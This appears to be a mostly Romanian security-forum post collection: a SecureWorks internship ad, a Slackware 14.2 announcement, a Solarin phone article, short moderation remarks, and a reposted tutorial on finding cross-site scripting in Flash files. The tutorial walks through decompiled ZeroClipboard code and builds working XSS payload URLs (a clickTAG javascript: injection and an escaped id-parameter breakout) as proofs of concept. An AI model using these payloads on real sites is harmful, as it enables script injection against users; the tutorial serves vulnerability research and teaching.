Nytro

Job-uri pe "security" (dar nu numai) la o firma care ofera doar servicii de "security" (Penetration Testing, Incident Response, Managed Security Services etc.): http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/5379111

Testez chiar acum. Da, nu prea merge de pe Tor. Ciudat. Foate ciudat. O sa ii intreb pe baietii de la hosting daca stiu ceva despre asta. Nu avem nicio regula in iptables (sau orice altceva) legat de Tor. Mai banam IP-uri cand primim DDOS, dar acum nu mai e niciun IP blocat.

Internship - Security Solutions - Rotating Shifts - SecureWorks Internship - Security Solutions - Rotating Shifts - SecureWorks Bucharest, Romania SecureWorks is a global leader in providing intelligence-driven information security solutions. We play an important role, as no organization in the world is immune from cyberattacks and the nature of the attack is changing every day. Internet security is a problem that will never be solved. Unlike point products that address a specific technology issue, we attack the problem holistically by analyzing threat actor tactics, techniques and procedures, and develop solutions using best-of-breed technologies to protect our clients. We are one of the best in the world at understanding the threat. In short, we give our clients an early warning capability. SecureWorks was founded in 1999 and headquartered in Atlanta, Ga., with offices in all the major security markets around the globe. We have more than 2,000 team members, and partner with more than 4,200 clients in 59 countries to keep the bad guys out of their networks. We've been consistently recognized by industry analysts, readers' polls and as a leader in the Gartner Magic Quadrant for managed security services, worldwide. Key Responsibilities Are you interested to start a career in Information Security? Then Dell SecureWorks is where you want to start! We are looking for passionate people that want to join our battle to protect our customers from Cybercrime. In this role you will be given a chance to learn from professionals that focus on providing the best cybersecurity services for the our clients. You will enjoy a multicultural, diverse and dynamic experience, during this 3 months contract, having the possibility to become a permanent employee. This role implies a rotating shift schedule of 12/24 -12/48 with the intial training period in regular business hours schedule (8 h/day). Your core focus will be: - Learn what security operations mean for all the SOC roles (Infosec, Vulnerability Management, Penetration Testing, Security Risk Management, Data Loss Prevention) - Get accustomed with some of the most complex security systems deployed on the customers served in SecureWorks Romania - Learn the SecureWorks culture and meet our local and global specialists As a managed security provider, SecureWorks expects its employees to understand and apply commonly known security practices and possess a working knowledge of applicable industry controls such as NIST 800-53. Employees will be expected to acknowledge their security responsibilities in writing prior to gaining access to company systems. Employees will be required to maintain a working knowledge of local security policies and execute general controls as assigned. Essential Requirements - You are passionate about the IT and Networking industry - You want to develop your Information Security skills - You are analytical and security focused - You like to spot trends and big picture - You have prioritization skills, sense of urgency - You communicate well to build relationship and trust - You are fluent in English. Desirable Requirements - Ideally recent graduate or final year student in a technically focused University - Basic knowledge of IT Security - Any IT certifications are a plus (CCNA, CompTIA Security+) SecureWorks is an Equal Opportunity Employer and Prohibits Discrimination and Harassment of Any Kind: SecureWorks is committed to the principle of equal employment opportunity for all employees and to providing employees with a work environment free of discrimination and harassment. All employment decisions at SecureWorks are based on business needs, job requirements and individual qualifications, without regard to race, color, religion or belief, national, social or ethnic origin, sex (including pregnancy), age, physical, mental or sensory disability, HIV Status, sexual orientation, gender identity and/or expression, marital, civil union or domestic partnership status, past or present military service, family medical history or genetic information, family or parental status, or any other status protected by the laws or regulations in the locations where we operate. SecureWorks will not tolerate discrimination or harassment based on any of these characteristics. SecureWorks encourages applicants of all ages. 16000J94 http://dell.referrals.selectminds.com/jobs/internship-security-solutions-secureworks-92325

OSCP.

A prezentat la Defcamp in detaliu. Vezi daca gasesti slide-urile.

http://andreicostin.com/index.php/brain/2009/11/14/ratb_card_activ_hacked http://andreicostin.com/media/blogs/brain/RATB_Card_Security_Assessment_v0_1.pdf

Fake, aparent.

After a long development cycle (including many betas and release candidates to get everything just exactly perfect) we're pleased to announce the availability of the new stable release. You'll find updates throughout the system, with the latest development tools and recent versions of applications, window managers, desktop environments, and utilities. The Linux kernel is updated to version 4.4.14 (part of the 4.4.x kernel series that will be getting long-term support from the kernel developers). We've brought together the best of these and other modern components and worked our magic on them. If you've used Slackware before, you'll find the system feels like home. For additional information, see the official announcement and the release notes. For a complete list of included packages, see the package list. Build scripts for all kinds of additional software for Slackware 14.2 can be found on the slackbuilds.org website. Want to give Slackware 14.2 a test drive without modifying your disk drive? Then check out Slackware Live Edition! This is a complete Slackware installation that can run from a CD, DVD, or USB stick. Thanks to Eric Hameleers for the great work on this! Here's where to find it: http://bear.alienbase.nl/mirrors/slackware/slackware-live/ Need help? Check out our documentation site, docs.slackware.com. Stop by and share your knowledge! Please consider supporting the Slackware project by picking up a copy of the Slackware 14.2 release from the Slackware Store. The discs are off to replication, but we're accepting pre-orders for the official 6 CD set and the DVD. The CD set is the 32-bit x86 release, while the DVD is a dual-sided disc with the 32-bit x86 release on one side and the 64-bit x86_64 release on the other. Thanks to our subscribers and supporters for keeping Slackware going all these years. Thanks to the Slackware team for all the hard work getting 14.2 ready for action! And of course, thanks to all the open source developers upstream, and to the Slackware community on linuxquestions.org for all the help with bug reports, suggestions, and patches. We couldn't have done it without you. Enjoy the new stable release! Pat and the Slackware crew +--------------------------+ Slackware 14.2 for ARM is also available. For details, see: http://arm.slackware.com Link: http://www.slackware.com/

Nu am aprobat topicul deoarece suna dubios. Posteaza din nou, putin mai explicit, deoarece nu se intelegea exact asta.

Mda... https://dev.mysql.com/doc/refman/5.7/en/blob.html

http://9gag.com/gag/aB1rZ3D Rezultat: http://9gag.com/gag/aXwXgXg

O solutie simpla si eficienta ar fi urmatoarea: 1. Faci o lista cu fisierele in care pastrezi si marimea lor (poti face si o sortare prin insertie, adica sa le ordonezi in functie de marime pentru optimizare) 2. Parcurgi lista si vezi care fisiere au aceeasi dimensiune (o sa iti fie usor daca lista e ordonata) 3. Pentru fisierele cu aceeasi marime, le compari byte cu byte, doar sa ai grija sa faci comparatia intre fiecare fisier si toate celelalte cu aceeasi dimensiune Nu este deloc practic sa faci hash-uri (ca idee) deoarece dureaza foarte mult. O comparatie byte cu byte este mult mai rapida. Ca sa faci hash-ul unui fisier iei toti bytes si ii treci printr-o gramada de operatii matematice ca apoi sa rezulte un hash, iar aceste operatii dureaza foarte mult. Comparatia simpla se face in O(n). E doar o idee.

https://www.facebook.com/sarah.leblanc.718/media_set?set=a.10101369198638985&type=3&pnref=story

Interesant, cred... Util? Posibil. Banuiesc ca se poate implementa in engine-urile antivirusilor pentru heuristica.

Pe scurt, pentru toti: http://blog.erratasec.com/2016/06/etheriumdao-hack-similfied.html#.V2eZVLh96Uk

Veit Hailperin, The Tale of a Fameless but Widespread Web Vulnerability Class - Security Fest 2016 Publicat pe 16 iun. 2016 Veit Hailperin is a security researcher and consultant at scip AG. They are based in Zürich, Switzerland with clients covering a wide range, from non-profit organizations and governmental agencies to banks and insurance companies. His research interests are focused on network and application layer security. Title: The Tale of a Fameless but Widespread Web Vulnerability Class Two keys components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding the vulnerability. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention - the OWASP Top 10. Additionally there is no public tool available to facilitate finding XSSI. The impact reaches from leaking personal information stored, circumvention of token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly wide spread and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, exploit XSSI and also how to protect against XSSI.

Mda, un script profesional ar trebui sa functioneze si fara JS. Nu cred ca am ce sa fac in aceasta privinta.

Nu prea mai avem timp de forum, cel putin eu... Nu vad de ce nu se poate inregistra cineva folosind Tor. Nu reusesc Guvernele sa opreasca Tor si reusim noi?

Incearca cu file:// sa citesti de pe disk.

Shit happens. Stie cineva cum au reusit?

Implementing an Obsolete VPN Protocol on Top of HTTP: Because Why Not? Posted by Niklaus Schiess Recently I’ve started some research on MikroTik’s RouterOS, the operating system that ships with RouterBOARD devices. As I’m running such a device myself, one day I got curious about security vulnerabilities that have been reported on the operating system and the running services as it comes with tons of features. Searching for known vulnerabilities in RouterOS on Google doesn’t really yield a lot of recent security related stuff. So I thought, there is either a lack of (public) research or maybe it is super secure… Not really satisfied with the outcome of my research about previous research one day I thought I give it a shot and just take a quick look at the management interfaces, mainly the web interface. As it turns out, there could be a third explanation for the lack of security related search results on Google: obfuscation. The communication of the web interface is obfuscated, most likely encrypted, which may discourages researchers that just came around to search for low hanging fruits. RouterOS WebFig RouterOS is a proprietary operating system for routers, based on Linux. It is available for various architectures, including x86. It can be downloaded directly from the vendor’s page and is usable for a couple of days without buying a license, which makes it really nice for researching. RouterOS provides different interfaces for device management: Winbox is a native application for Windows WebFig is a web interface Access to a Cisco-like shell via SSH/Telnet An API that is not enabled by default This blog post will cover the WebFig interface running on TCP port 80. By default there is no HTTPS interface available (which would lead to using untrusted certificates anyway). However, the release notes of RouterOS 5.5 state: “webfig – encrypt whole session even in non https mode;”. Here it becomes quite interesting. The question is: how are they actually encrypting HTTP traffic without using SSL/TLS? I’ve fired up Burp and started to inspect the HTTP request of WebFig. Articol complet: https://www.insinuator.net/2016/05/implementing-an-obsolete-vpn-protocol-on-top-of-http-because-why-not/

Sirin Labs launches ultra-secure, ultra-expensive Solarin smartphone It's the 'best' and 'most secure' phone ever made, its maker claims. By Charles McLellan for Product Central | May 31, 2016 -- 20:40 GMT (21:40 BST) | Topic: Smartphones Sirin Labs' co-founders Kenes Rakishev, Moshe Hogeg and Tal Cohen launch the Solarin smartphone in London. Image: Charles McLellan/ZDNet If you're a startup launching into the hyper-competitive smartphone market, then -- as well as plenty of funding and nerves of steel -- you'll need to target a sector with room for yet another vendor. Sirin Labs, co-founded in 2013 by Kenes Rakishev (chairman), Moshe Hogeg (president) and Tal Cohen (CEO), is funded to the tune of $72 million (£49.6m) and launched its first product,Solarin -- which Hogeg confidently described as "the best phone ever made, and for sure the most secure phone ever made" -- in central London today. Solarin is also one of the most expensive smartphones ever made, starting at £9,500/$14,800 plus taxes. Despite its price, the 5.5-inch Android-based Solarin is largely free of 'bling'-style decoration. Image: Sirin Labs Of course, expensive smartphones are available from the likes of Vertu, and secure ones from Silent Circle and others, so Sirin Labs isn't exactly entering virgin territory. But if you're a business leader, entrepreneur or financier with a lot of confidential information, a lot of communication needs, and the wherewithal to drop ten grand (sterling) on a phone, then Sirin Labs thinks you're a potential customer. Despite its price, Solarin isn't an over-decorated 'bling' phone. Indeed, this Swedish-designed-and-built Android (5.1) handset looks relatively restrained. It packs a decent, if not always cutting-edge, specification, including: A 2GHz Qualcomm Snapdragon 810 octa-core SoC with 4GB of RAM and 128GB of internal storage; A 5.5-inch Gorilla Glass 4-protected IPS LCD with 2,560 by 1,440 resolution (538ppi), delivering 120 percent of the sRGB colour gamut, 1,500:1 typical contrast ratio and 600cd/m2 typical brightness; A 24-megapixel main camera with laser autofocus, quad-tone flash, optical image stabilisation and 4k video recording at 30fps, plus an 8-megapixel front camera with flash, electrical image stabilisation and HD video recording at 60fps; An audio subsystem comprising three bass-boosted speakers and four microphones, plus a smart amplifier designed to maximise volume while minimising distortion; Support for 24 LTE bands, 802.11ac wi-fi with 2x2 MU-MIMO and 60GHz WiGig; and A 4,040mAh li-ion battery with claimed talk time of 31 hours (UMTS), standby time of 'over 2 weeks' and Qualcomm QuickCharge 2.0 support "Whenever you see something in our spec that isn't the latest, there's a very good reason for that," said CEO Tal Cohen at the launch, citing the 2k screen's combination of brightness, colour gamut and power consumption as an advantage over a 4k screen as an example. The Solarin measures 78mm wide by 159.8mm deep by 11.1mm thick, weighs 243g, is water/dust resistant to IP54 level and comes in Fibre Black Carbon Titanium, Fibre Black Carbon DLC, Fibre Black Carbon Yellow Gold and Crystal White Carbon DLC variants. Security Solarin's Security Shield mode offers hardware-based, end-to-end encrypted VoIP calls and messages. Image: Charles McLellan/ZDNet Security is Sirin Labs' main focus, and its solution for the Solarin phone comprises three main elements: Mobile threat protection from Zimperium, offering continuous protection against network, host-based and physical attacks; Encrypted email powered by ProtonMail, which combines public-key cryptography with symmetric encryption protocols to offer end-to-end encryption via a 2-password system; and Security Shield from KoolSpan, which enables hardware-based, end-to-end encrypted VoIP calls and messages using military-grade AES-256, FIPS 140-2 encryption. Security Shield mode is activated via a sliding Security Switch above the camera lens (diamond-inlaid, naturally), which also shuts down unnecessary operations on the phone. Is Sirin Labs' Solarin the best and most secure phone ever made, as co-founder and president Moshe Hogeg claims? Given the price, it'll need to be, and we look forward to investigating further in a full review in due course. If that ten grand is burning a hole in your pocket, the Solarin is available online now, at Sirin Labs' store in London's Mayfair (34 Bruton Place) from 1 June, and from Harrods in Knightsbridge from 30 June. Update, June 2 2016 Vertu is the best-known name in the 'luxury technology' market, and ZDNet asked CEO Gordon Watson for his reactions to Sirin Labs' Solarin launch: "Vertu is always interested to see new entrants in the luxury technology space and we welcome competition to the market. While that category has had many players over the years, Vertu has often been a lone voice within it. However, while the luxury technology category is growing, competing within it is tough, particularly with high-end or luxury mobile phones. Vertu has been honing its business for 18 years and continues to innovate in order to keep pace with changes in both the technology and luxury industries," said Watson. On the Solarin phone's emphasis on security and design/build quality rather than overtly luxurious features, Watson had this to say: "At this stage we've not seen the product first hand, so it would be impossible to judge it fairly. Vertu's smartphone products have been the brand's best sellers over the last three years and these combine leading-edge technology, precision-engineered build and a suite of personalised and curated services -- the combination of these three elements are vital to Vertu and allow us to offer a unique proposition." "We also believe that e-commerce, a global retail network and strong after-sales care add significantly to the consumer experience. Security has been a fundamental of the Vertu brand since the launch of its Signature S model in 2002 and the company continues to work closely with in-house security experts as well as external partners -- not least Google -- to ensure that customers are fully protected." And on Vertu's roadmap: "Vertu switched investment partners in the last quarter of 2015, moving to a team with knowledge of both the technology industry and the evolving Asian luxury market. The benefits of this new investment and expertise will be seen with a series of product launches in the latter part of 2016 and beyond." Sursa: http://www.zdnet.com/article/sirin-labs-launches-ultra-secure-ultra-expensive-solarin-smartphone/

25 MAY 2016 on security Over the years I found a lot of cross-site scripting vulnerabilities in flash files (recognizable by the .swf extension). Finding cross-site scripting vulnerabilities in flash files is some sort of a hobby for me because it almost always succeeds. It's pretty obvious that the awareness of cross-site scripting vulnerabilities is even lower than those of PHP developers. To start, unfortunately you can't do "right mouse click, view-source" on a flash file but fortunately there are a couple of tools that can do it for you. For example http://www.showmycode.com/. A large list of tools can be found here: http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html To demonstrate how I analyze a flash file I'm going use the banner.swf file and the zeroclipboard.swf cross-site scripting for example of which the banner.swf is a commonly known mistake and the zeroclipboard.swf file is a known vulnerable flash file that has been made public in 2012 on Github (https://github.com/zeroclipboard/zeroclipboard/issues/14). banner.swf This vulnerability is pretty basic. When the clicktag function in Actionscript allows unfiltered user input it can used to inject javascript url's for example javascript:alert(1). The getUrl function is used a lot and is often poorly filtered or not filtered at all. An example of a vulnerable flash file decompiled via showmycode: on (release) { geturl (_root.clickTAG, "_self"); } on (release) is a trigger that execute a code when the mouse is pressed and _root.clickTAG stands for the clickTAG parameter which is not escaped or what so ever and is therefor vulnerable for cross-site scripting attacks. The vulnerability could be reproduced by going to the following these steps: Go to banner.swf?clickTAG=javascript:alert(1) A press on the page (anywhere in this case) zeroclipboard.swf Zeroclipboard is a library used to modify the users clipboard often used to provide a "copy to clipboard" functionality. This vulnerability is a bit more complex than the banner.swf. Huge companies like coindesk and Yahoo were vulnerable for this vulnerability so for me it's pretty interesting to know where this issue originated from. To start our search we need a vulnerable zeroclipboard file. A mirror of the vulnerable version can be downloaded here:http://github.com/cure53/Flashbang/raw/master/flash-files/files/ZeroClipboard.swf I decompiled the source using showmycode: package { import flash.events.*; import flash.display.*; import flash.external.*; import flash.system.*; import flash.utils.*; public class ZeroClipboard extends Sprite { private var button:Sprite; private var id:String = ""; private var clipText:String = ""; public function ZeroClipboard(){ super(); stage.scaleMode = StageScaleMode.EXACT_FIT; Security.allowDomain("*"); var flashvars:* = LoaderInfo(this.root.loaderInfo).parameters; id = flashvars.id; button = new Sprite(); button.buttonMode = true; button.useHandCursor = true; button.graphics.beginFill(0xCCFF00); button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); button.alpha = 0; addChild(button); button.addEventListener(MouseEvent.CLICK, clickHandler); button.addEventListener(MouseEvent.MOUSE_OVER, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOver", null); }); button.addEventListener(MouseEvent.MOUSE_OUT, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOut", null); }); button.addEventListener(MouseEvent.MOUSE_DOWN, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseDown", null); }); button.addEventListener(MouseEvent.MOUSE_UP, function (_arg1:Event){ ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseUp", null); }); ExternalInterface.addCallback("setHandCursor", setHandCursor); ExternalInterface.addCallback("setText", setText); ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null); } public function setHandCursor(_arg1:Boolean){ button.useHandCursor = _arg1; } private function clickHandler(_arg1:Event):void{ System.setClipboard(clipText); ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); } public function setText(_arg1){ clipText = _arg1; } } }//package The function we are searching for is ExternalInterface.call. This function is used to call JavaScript functions from flash files and it's unreliable. When unfiltered input is passed to this function it's possible to inject your own JavaScript. A quick search for ExternalInterface.call returned: ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); What we have to do now is find out how this function get's triggered. The example I used sits within a function called clickHandler so I did a quick search for clickHandler and found that it get's triggered when there is a click on a element named "button". What is button? Well, button = new Sprite(); which is a class used for user interface components. Let's take a look at the part where the sprite is created: button = new Sprite(); button.buttonMode = true; button.useHandCursor = true; button.graphics.beginFill(0xCCFF00); button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); button.alpha = 0; addChild(button); By looking at this part you might already have noticed the 5th line. button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height)); This part determines the width and height of the button sprite by using two variables. flashvars.width and flashvars.height. To find out where this parameters are set we don't have to look very far. By searching for flashvarsit's pretty easy to find out that flashvars stands for LoaderInfo(this.root.loaderInfo).parameters; which is used to get the parameters from a request. So, to set the width and height from the button element we have to add two parameters to the zeroclipboard.swf file in the url. Now, when the mouse is hovered over the button the function clickHandler will be called which triggers our vulnerable part of code that we want to reach. /zeroclipboard.swf?width=1000&height=1000 Now we have to exploit the vulnerable part of code, let's get back to the vulnerable line: ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText); The id variable actually is user input, you can see that by searching for the id variable. In the code you will find id = flashvars.id; So, now we know that the variable id can be set by requesting the flash file with the parameter id (I almost could have guessed it..) To turn this into a cross-site scripting we first have to know how ActionScript generates the JavaScript code for the ExterinalInterface.call The code looks like this: try { __flash__toXML(ZeroClipboard.dispatch("USER INPUT HERE","load",null)) ; } catch (e) { "<undefined/>"; } User input is located at "USER INPUT HERE" so there is where we should try to break out. First we need to get out of the double quotes. We can't just do this by typing "because ActionScript does escape this input. Luckily it can be escaped by adding a backslash in front of it. So our payload needs to start with \". This will turn the generated JavaScript into: try { __flash__toXML(ZeroClipboard.dispatch("\\"","load",null)) ; } catch (e) { "<undefined/>"; } All we have to do now is inject our own script and make sure that it's valid JavaScript. First, let's add two forward slashes at the end of our payload. By adding two forward slashes at the end of our payload JavaScript will see everything behind it as a command try { __flash__toXML(ZeroClipboard.dispatch("\\"//","load",null)) ; } catch (e) { "<undefined/>"; } Because we shopped of the end of the function it now looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\" This is invalid JavaScript but we can fix that! Let's start by ending two the functions ZeroClipboard.dispatch and __flash__toXML Our payload now looks like this: \"))// and the generated JavaScript looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\")) Now we have to end the try statement, we do this by using } catch(e) {} Our payload now looks like this: \"))} catch(e) {}// and the generated JavaScript looks like this: try { __flash__toXML(ZeroClipboard.dispatch("\\"))} catch(e) {} This is perfectly valid JavaScript, all we have to do now is inject our payload. We can add the payload (for example, an alert) in the catch statement like this: \"))} catch(e) {alert(1);}// which makes the final url: /zeroclipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 List of known vulnerable flash files I started a public spreadsheet where everybody can contribute to make a list of vulnerable SWF files. You can contribute to the list here: https://docs.google.com/spreadsheets/d/1zWc4Sf0pk_6lDVG0Lm-SjFbVVR8hY5X9WoKJNPhGWCs The list Flashbang An awesome tool that can help you to find vulnerabilities in flash files is flashbang. It can be found here: https://cure53.de/flashbang. It's created by cure53 (obviously) and it's even open source on Github available here:https://github.com/cure53/Flashbang Resources http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/ https://github.com/DBA/swf_file https://github.com/cure53/Flashbang https://github.com/zeroclipboard/zeroclipboard/issues/14 http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html smiegles Read more posts by this author. Sursa: https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/

E o buna promovare pentru tara noastra. E povestea cuiva care munceste si care e recunoscut de catre multe companii. Normal, nu e singurul care se ocupa cu asa ceva si care o face bine, dar este unul dintre ei.

E freelancing. E pasiune. It's a way of life.